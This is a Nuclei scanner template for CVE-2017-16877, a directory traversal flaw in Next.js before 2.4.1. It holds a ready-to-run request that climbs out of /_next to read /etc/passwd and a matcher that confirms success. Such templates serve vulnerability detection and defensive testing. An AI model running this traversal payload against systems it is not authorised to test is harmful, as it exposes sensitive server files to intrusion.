nuclei-templates/cves/2017/CVE-2017-16877.yaml

28 lines
686 B
YAML

id: CVE-2017-16877
info:
name: Nextjs v2.4.1 LFI
author: pikpikcu
severity: high
description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
tags: cve,cve2017,nextjs,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
condition: and
- type: status
status:
- 200